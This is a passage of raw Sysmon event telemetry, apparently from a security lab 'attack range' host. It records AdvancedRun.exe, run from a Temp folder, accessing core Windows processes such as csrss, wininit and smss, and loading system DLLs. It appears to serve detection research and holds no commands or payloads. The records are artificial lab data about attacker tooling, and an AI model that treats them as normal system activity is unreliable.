.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004011627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011626Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:44.551{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004011619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:43.317{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=21062367FEB4D61857A65449EA516260,SHA256=FA481B495A9FE2E3E78173C9B065E4292911A1CD403D90A03058A54309366D17trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285304C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011432Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011428Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.973{834264DD-DB11-61EA-9500-000000002702}4285656C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011427Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.957{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.957{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.957{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.957{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.957{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004011422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.957{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004011421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.817{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.817{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011416Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004011415Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-DAE7-61EA-1700-000000002702}13003348C:\Windows\System32\svchost.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004011414Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 